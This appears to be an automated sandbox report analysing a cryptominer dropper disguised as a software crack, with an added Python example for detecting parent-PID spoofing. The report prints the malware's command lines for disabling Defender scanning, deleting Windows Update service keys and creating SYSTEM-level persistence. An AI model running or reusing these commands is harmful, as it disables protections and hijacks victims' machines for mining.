Analysis
-
max time kernel: 150s
max time network: 142s
platform: windows10-2004_x64
resource: win10v2004-20230220-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230220-en, locale:en-us, os:windows10-2004-x64, system
submitted: 17-03-2023 10:57
Static task: static1
URLScan task: urlscan1
General
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes: reg.exe
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 (reg.exe)
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 (reg.exe)
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo (reg.exe)
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters (reg.exe)
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security (reg.exe)
-
Suspicious use of NtCreateUserProcessOtherParentProcess 16 IoCs
Each row is a process created with its parent attribute pointed at Explorer.EXE (PID 664) instead of the calling process, so the children appear under Explorer in the process tree rather than under the dropper.
Processes: Crack.exe, Update.exe, conhost.exe, Crack.exe
- PID 3616 created 664 (Crack.exe, target process Explorer.EXE), 5 times
- PID 3604 created 664 (Update.exe, target process Explorer.EXE), 5 times
- PID 4944 created 664 (conhost.exe, target process Explorer.EXE), 1 time
- PID 3604 created 664 (Update.exe, target process Explorer.EXE), 1 time
- PID 2192 created 664 (Crack.exe, target process Explorer.EXE), 4 times
-
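The parent-spoofing rows above only make sense if you separate the PID that issued the create call from the parent the new process reports. The block below is an added example, not part of the original report or of the sample: it assumes a telemetry source that records both values (for instance the header PID of a kernel process-creation ETW event next to the ParentProcessId in its payload), and the tuple layout, field names and sample events are constructed to mirror the report (Crack.exe 3616 creating helpers that claim Explorer.EXE 664 as parent).

```python
"""Separate the real creator of a process from the parent it claims.

Added example, not part of the original sandbox report. It assumes a
telemetry source that records both the PID that issued the create call
(e.g. the header PID of a kernel process-creation ETW event) and the
parent PID the new process reports; the tuple layout and the field
names are assumptions, not a particular EDR schema.
"""
from collections import defaultdict

# Constructed to mirror the report: Crack.exe (3616) creates its helpers
# with the parent attribute pointed at Explorer.EXE (664), so a tree built
# from the reported parent shows them as Explorer's children.
# (new pid, image, creator pid, reported parent pid)
SAMPLE_EVENTS = [
    (3616, "Crack.exe", 664, 664),        # genuine child of Explorer
    (708, "powershell.exe", 3616, 664),   # spoofed parent
    (736, "cmd.exe", 3616, 664),          # spoofed parent
    (3644, "powercfg.exe", 736, 736),     # genuine child of cmd.exe
    (5068, "powershell.exe", 3616, 664),  # spoofed parent
]


def find_spoofed(events):
    """Map pid -> (image, creator, claimed parent) where the two PIDs differ."""
    return {pid: (image, creator, parent)
            for pid, image, creator, parent in events if creator != parent}


def claimed_tree(events):
    """Children keyed by the parent each process reports (what Task Manager
    and a naive process-tree view would show)."""
    tree = defaultdict(list)
    for pid, image, _, parent in events:
        tree[parent].append((pid, image))
    return dict(tree)


def true_tree(events):
    """Children keyed by the PID that actually called NtCreateUserProcess."""
    tree = defaultdict(list)
    for pid, image, creator, _ in events:
        tree[creator].append((pid, image))
    return dict(tree)


def render(tree, root, depth=0):
    """Indented text rendering of a tree dict, returned as a list of lines."""
    lines = []
    for pid, image in sorted(tree.get(root, [])):
        lines.append("  " * depth + f"{image} ({pid})")
        lines.extend(render(tree, pid, depth + 1))
    return lines


if __name__ == "__main__":
    for pid, (image, creator, parent) in find_spoofed(SAMPLE_EVENTS).items():
        print(f"{image} ({pid}) created by {creator}, claims parent {parent}")
    print("\n".join(render(true_tree(SAMPLE_EVENTS), 664)))
```

With only the claimed parent (Sysmon event 1 reports the spoofed parent as ParentProcessId), the PowerShell and cmd.exe helpers look like Explorer children; keyed by creator they fall back under Crack.exe, which is the tree an analyst wants when attributing the Defender exclusion and service tampering to the dropper.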
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs
Processes: Crack.exe, Update.exe, Crack.exe
- Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (Crack.exe)
- Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (Update.exe)
- Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ (Crack.exe)
-
XMRig Miner payload 6 IoCs
Processes: resource / yara_rule
- behavioral1/memory/2408-295-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp (xmrig)
- behavioral1/memory/2408-296-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp (xmrig)
- behavioral1/memory/2408-298-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp (xmrig)
- behavioral1/memory/2408-304-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp (xmrig)
- behavioral1/memory/2408-308-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp (xmrig)
- behavioral1/memory/2408-312-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp (xmrig)
-
Drops file in Drivers directory 3 IoCs
Processes: Crack.exe, Update.exe, Crack.exe
- File created C:\Windows\System32\drivers\etc\hosts (Crack.exe)
- File created C:\Windows\System32\drivers\etc\hosts (Update.exe)
- File created C:\Windows\System32\drivers\etc\hosts (Crack.exe)
-
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes: Crack.exe, Crack.exe, Update.exe
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (Crack.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (Crack.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (Crack.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (Crack.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion (Update.exe)
- Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion (Update.exe)
-
Executes dropped EXE 1 IoCs
Processes: Update.exe
- PID 3604 Update.exe
-
Themida packer (YARA rule themida) 21 IoCs
Processes: resource / yara_rule
- behavioral1/memory/3616-151-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmp (themida)
- behavioral1/memory/3616-152-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmp (themida)
- behavioral1/memory/3616-153-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmp (themida)
- behavioral1/memory/3616-154-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmp (themida)
- behavioral1/memory/3616-155-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmp (themida)
- behavioral1/memory/3616-187-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmp (themida)
- behavioral1/memory/3616-193-0x00007FF6BAB10000-0x00007FF6BB7C3000-memory.dmp (themida)
- C:\Program Files\ChromeUpdate\Update.exe (themida)
- behavioral1/memory/3604-209-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmp (themida)
- behavioral1/memory/3604-210-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmp (themida)
- behavioral1/memory/3604-211-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmp (themida)
- behavioral1/memory/3604-212-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmp (themida)
- behavioral1/memory/3604-223-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmp (themida)
- behavioral1/memory/3604-248-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmp (themida)
- C:\Program Files\ChromeUpdate\Update.exe (themida)
- behavioral1/memory/3604-292-0x00007FF7BC0E0000-0x00007FF7BCD93000-memory.dmp (themida)
- behavioral1/memory/2192-299-0x00007FF737EC0000-0x00007FF738B73000-memory.dmp (themida)
- behavioral1/memory/2192-300-0x00007FF737EC0000-0x00007FF738B73000-memory.dmp (themida)
- behavioral1/memory/2192-301-0x00007FF737EC0000-0x00007FF738B73000-memory.dmp (themida)
- behavioral1/memory/2192-302-0x00007FF737EC0000-0x00007FF738B73000-memory.dmp (themida)
- behavioral1/memory/2192-306-0x00007FF737EC0000-0x00007FF738B73000-memory.dmp (themida)
-
UPX packed (YARA rule upx) 7 IoCs
Processes: resource / yara_rule
- behavioral1/memory/2408-290-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp (upx)
- behavioral1/memory/2408-295-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp (upx)
- behavioral1/memory/2408-296-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp (upx)
- behavioral1/memory/2408-298-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp (upx)
- behavioral1/memory/2408-304-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp (upx)
- behavioral1/memory/2408-308-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp (upx)
- behavioral1/memory/2408-312-0x00007FF7C4150000-0x00007FF7C4944000-memory.dmp (upx)
-
Queries UAC policy (EnableLUA) 1 IoCs
Processes: Update.exe
- Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA (Update.exe)
-
Drops file in System32 directory 3 IoCs
The paths are under C:\Windows\system32\config\systemprofile, the profile of the LocalSystem account, so these PowerShell instances ran as SYSTEM.
Processes: powershell.exe, powershell.exe
- File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (powershell.exe)
- File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
- File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
-
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes: Crack.exe, Update.exe, Crack.exe
- PID 3616 Crack.exe
- PID 3604 Update.exe
- PID 2192 Crack.exe
-
Suspicious use of SetThreadContext 2 IoCs
Update.exe rewrites the thread context of two conhost.exe children it spawned. Together with the XMRig and UPX YARA hits on the memory of PID 2408, this is consistent with the miner being injected into a freshly created conhost.exe rather than run from disk.
Processes: Update.exe
- PID 3604 set thread context of 4944 (Update.exe, target process conhost.exe)
- PID 3604 set thread context of 2408 (Update.exe, target process conhost.exe)
-
Drops file in Program Files directory 4 IoCs
Processes: cmd.exe, Crack.exe, Update.exe, cmd.exe
- File created C:\Program Files\Google\Libs\g.log (cmd.exe)
- File created C:\Program Files\ChromeUpdate\Update.exe (Crack.exe)
- File created C:\Program Files\Google\Libs\WR64.sys (Update.exe)
- File created C:\Program Files\Google\Libs\g.log (cmd.exe)
-
Launches sc.exe 15 IoCs
Sc.exe is a Windows utility to control services on the system.
Processes: sc.exe (15 instances)
- PIDs 3292, 1768, 4916, 4284, 1424, 180, 2740, 3484, 5080, 1512, 4492, 5036, 3756, 3484, 2300 (sc.exe)
-
Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
Processes: iexplore.exe
- Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Internet Explorer\PhishingFilter (iexplore.exe)
- Set value (data) \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\SOFTWARE\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = d3273793ae45d901 (iexplore.exe)
-
Modifies Internet Explorer settings 29 IoCs
Processes: iexplore.exe, IEXPLORE.EXE
All keys are under \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Software\Microsoft\Internet Explorer\ and were written by iexplore.exe unless noted.
- Set value (data) Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000
- Set value (int) VersionManager\LastTTLHighDateTime = "50"
- Key created DomainSuggestion
- Key created Recovery\PendingRecovery
- Key created DomainSuggestion\FileNames\
- Set value (int) MINIE\TabBandWidth = "500"
- Key created RepId
- Set value (str) RepId\PublicId = "{18F39858-8E46-4D57-97A8-2B28041FA364}"
- Set value (int) VersionManager\LastUpdateHighDateTime = "31021255"
- Key created VersionManager
- Set value (int) VersionManager\LastCheckForUpdateLowDateTime = "3292743203"
- Set value (int) VersionManager\LastCheckForUpdateHighDateTime = "31021255"
- Key created Main
- Key created MINIE
- Set value (int) VersionManager\LastTTLLowDateTime = "1251635200"
- Key created DomainSuggestion\FileNames\
- Set value (int) Recovery\AdminActive\{EF5E2C87-C4BA-11ED-9F77-62080863D4B5} = "0"
- Key created Main\WindowsSearch
- Set value (int) Recovery\PendingRecovery\AdminActive = "0"
- Key created Main (IEXPLORE.EXE)
- Set value (str) DomainSuggestion\FileNames\en-US = "en-US.1"
- Key created DomainSuggestion
- Set value (int) DomainSuggestion\NextUpdateDate = "385819243"
- Set value (int) Main\CompatibilityFlags = "0"
- Key created Recovery\AdminActive
- Set value (str) Main\WindowsSearch\Version = "WS not running"
- Set value (str) Main\FullScreen = "no"
- Set value (int) VersionManager\LastUpdateLowDateTime = "3292743203"
- Key created DomainSuggestion\FileNames
-
Modifies data under HKEY_USERS 64 IoCs
Processes: powershell.exe, powershell.exe
All entries are under \REGISTRY\USER\.DEFAULT\Software\ and were written by powershell.exe; repeated hits are marked with a count.
Key created under Microsoft\SystemCertificates\ (35 hits):
- Root (x2), Root\Certificates (x2), Root\CTLs (x2), Root\CRLs
- CA (x2), CA\Certificates, CA\CRLs (x2), CA\CTLs
- Disallowed, Disallowed\Certificates, Disallowed\CRLs, Disallowed\CTLs
- trust (x2), trust\Certificates, trust\CTLs (x2)
- TrustedPeople, TrustedPeople\Certificates (x2), TrustedPeople\CRLs (x2), TrustedPeople\CTLs
- SmartCardRoot (x2), SmartCardRoot\Certificates (x2), SmartCardRoot\CRLs, SmartCardRoot\CTLs (x2)
Key created under Policies\Microsoft\SystemCertificates\ (21 hits):
- CA, CA\CTLs (x2), CA\CRLs
- Disallowed (x2), Disallowed\Certificates, Disallowed\CRLs, Disallowed\CTLs (x2)
- trust, trust\Certificates (x2), trust\CTLs (x2)
- TrustedPeople, TrustedPeople\Certificates (x2), TrustedPeople\CRLs, TrustedPeople\CTLs (x2)
Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ (6 hits):
- Key created ZoneMap\ (x2)
- Set value (int) ZoneMap\AutoDetect = "0"
- Set value (int) ZoneMap\ProxyBypass = "1" (x2)
- Set value (int) ZoneMap\IntranetName = "1"
Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing (2 hits):
- Key created (x2)
-
Modifies registry class 1 IoCs
Processes: iexplore.exe
- Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings (iexplore.exe)
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes: Crack.exe, powershell.exe, powershell.exe, powershell.exe, Update.exe, powershell.exe, powershell.exe, conhost.exe, conhost.exe
Hits per process (in recorded order):
- 3616 Crack.exe (10 hits)
- 708 powershell.exe (2 hits)
- 5068 powershell.exe (3 hits)
- 5064 powershell.exe (2 hits)
- 3604 Update.exe (14 hits)
- 3420 powershell.exe (2 hits)
- 3292 powershell.exe (2 hits)
- 4944 conhost.exe (2 hits)
- 2408 conhost.exe (remaining 27 hits)
-
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
- PID 656 (no process name recorded)
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes: powershell.exe (708), powercfg.exe (3644), powershell.exe (5068), powercfg.exe (4880), powercfg.exe (3532), powercfg.exe (1920)
- Token: SeDebugPrivilege 708 powershell.exe
- Token: SeShutdownPrivilege, SeCreatePagefilePrivilege 3644 powercfg.exe
- Token: SeDebugPrivilege 5068 powershell.exe
- Token: SeShutdownPrivilege, SeCreatePagefilePrivilege 4880 powercfg.exe
- Token: SeShutdownPrivilege, SeCreatePagefilePrivilege 3532 powercfg.exe
- Token: SeShutdownPrivilege, SeCreatePagefilePrivilege 1920 powercfg.exe
- Token: the full administrative set enabled by 5068 powershell.exe, recorded twice in full and a third time truncated at SeShutdownPrivilege by the 64-IoC display cap: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
-
Suspicious use of FindShellTrayWindow 2 IoCs
Processes: iexplore.exe
- PID 940 iexplore.exe (x2)
-
Suspicious use of SetWindowsHookEx 4 IoCs
Processes: iexplore.exe, IEXPLORE.EXE
- PID 940 iexplore.exe (x2)
- PID 2448 IEXPLORE.EXE (x2)
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes: iexplore.exe, cmd.exe, cmd.exe, powershell.exe, cmd.exe, cmd.exe, Update.exe, cmd.exe
Writer (PID, image) to target (PID, image); each pair is recorded twice unless noted:
- 940 iexplore.exe wrote to 2448 IEXPLORE.EXE (x3)
- 392 cmd.exe wrote to sc.exe 180, 2740, 3484, 1512, 3292
- 736 cmd.exe wrote to powercfg.exe 3644, 4880, 3532, 1920
- 392 cmd.exe wrote to reg.exe 2688, 2044, 3620, 4960, 4064
- 5064 powershell.exe wrote to 3964 schtasks.exe
- 3316 cmd.exe wrote to sc.exe 4492, 1768, 4916, 3484, 2300
- 3644 cmd.exe wrote to powercfg.exe 3844, 4108, 3532, 3868
- 3316 cmd.exe wrote to reg.exe 764, 4168, 5116, 2688, 1756
- 3604 Update.exe wrote to 4944 conhost.exe (x1)
- 3796 cmd.exe wrote to 1616 WMIC.exe
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy WMI provider
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
Level 1: C:\Program Files\Internet Explorer\iexplore.exe
Command line: "C:\Program Files\Internet Explorer\iexplore.exe" https://github.com/crack-watch/files/releases/download/ca/Crack.zip
- Modifies Internet Explorer Phishing Filter
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
Level 2: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:940 CREDAT:17410 /prefetch:2
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
Level 1: C:\Windows\Explorer.EXE
Command line: C:\Windows\Explorer.EXE
-
Level 2: C:\Users\Admin\AppData\Local\Temp\Temp1_Crack.zip\Crack.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\Temp1_Crack.zip\Crack.exe"
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
Level 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Level 2: C:\Windows\System32\cmd.exe
Command line: C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
- Suspicious use of WriteProcessMemory
-
Level 3: C:\Windows\System32\powercfg.exe
Command line: powercfg /x -hibernate-timeout-ac 0
- Suspicious use of AdjustPrivilegeToken
-
Level 3: C:\Windows\System32\powercfg.exe
Command line: powercfg /x -hibernate-timeout-dc 0
- Suspicious use of AdjustPrivilegeToken
-
Level 3: C:\Windows\System32\powercfg.exe
Command line: powercfg /x -standby-timeout-ac 0
- Suspicious use of AdjustPrivilegeToken
-
Level 3: C:\Windows\System32\powercfg.exe
Command line: powercfg /x -standby-timeout-dc 0
- Suspicious use of AdjustPrivilegeToken
-
Level 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#vieybfx#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'ChromeUpdate' /tr '''C:\Program Files\ChromeUpdate\Update.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\ChromeUpdate\Update.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ChromeUpdate' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ChromeUpdate" /t REG_SZ /f /d 'C:\Program Files\ChromeUpdate\Update.exe' }
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
Level 2: C:\Windows\System32\cmd.exe
Command line: C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
- Suspicious use of WriteProcessMemory
-
Level 3: C:\Windows\System32\sc.exe
Command line: sc stop UsoSvc
- Launches sc.exe
-
Level 3: C:\Windows\System32\sc.exe
Command line: sc stop WaaSMedicSvc
- Launches sc.exe
-
Level 3: C:\Windows\System32\sc.exe
Command line: sc stop wuauserv
- Launches sc.exe
-
Level 3: C:\Windows\System32\sc.exe
Command line: sc stop bits
- Launches sc.exe
-
Level 3: C:\Windows\System32\sc.exe
Command line: sc stop dosvc
- Launches sc.exe
-
Level 3: C:\Windows\System32\reg.exe
Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
-
Level 3: C:\Windows\System32\reg.exe
Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
-
Level 3: C:\Windows\System32\reg.exe
Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
- Modifies security service
-
Level 3: C:\Windows\System32\reg.exe
Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
-
Level 3: C:\Windows\System32\reg.exe
Command line: reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
-
Level 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iznvhmil#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "ChromeUpdate" } Else { "C:\Program Files\ChromeUpdate\Update.exe" }
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
Level 3: C:\Windows\system32\schtasks.exe
Command line: "C:\Windows\system32\schtasks.exe" /run /tn ChromeUpdate
-
Level 2: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe wwcervyd2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe ppqblwpwmghhsixh 6E3sjfZq2rJQaxvLPmXgsA4f0StS9pic9Xw++oZ1mnbMNdSoXP4ts/KtNDhUPQkUFX9zerOLqyfV5p5IIIPTXecif75D+VYXIOaD4tnkrB2fDP9IQZMfg+iVVlhNRbmMN79MRifyO6Uwq7r7QxsXJx8n4Obz+C1TNZT/sBjhHaly+SynWhZiN24prHp/VTq7aAaWmtebCxKPk7tjsUOqkI/WY5IIYD/L/mVq2a7Uu9ZR/uUtm5j9plmQ6U+x61NNlg9L8LtJ//u1Fij39xU/WDSZow7jB4TkbvCOgFDyM4S6KqA9TPgrAJpGF6UT5CV/U725i+yYtjtkyP1WXyAgKjQR9PF97HfDROjSbrwKz7I/IdS3E3JvmMLokmQrzQ2tSPn0A76ciJ3JMty2BZtsAwoFXhQGVnofvN3B5vTs4kmoB+gkXCpRmPI4rTUz+43QeZFm3lO1uhw0nEtewSCLk4LGxQqR9mz9g0drWGN5XtJesEB2BtBwFU6bQGegMZe20enAYVBIDmIJ+z3YxlqN8Q==2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Crack.zip\Crack.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_Crack.zip\Crack.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
-
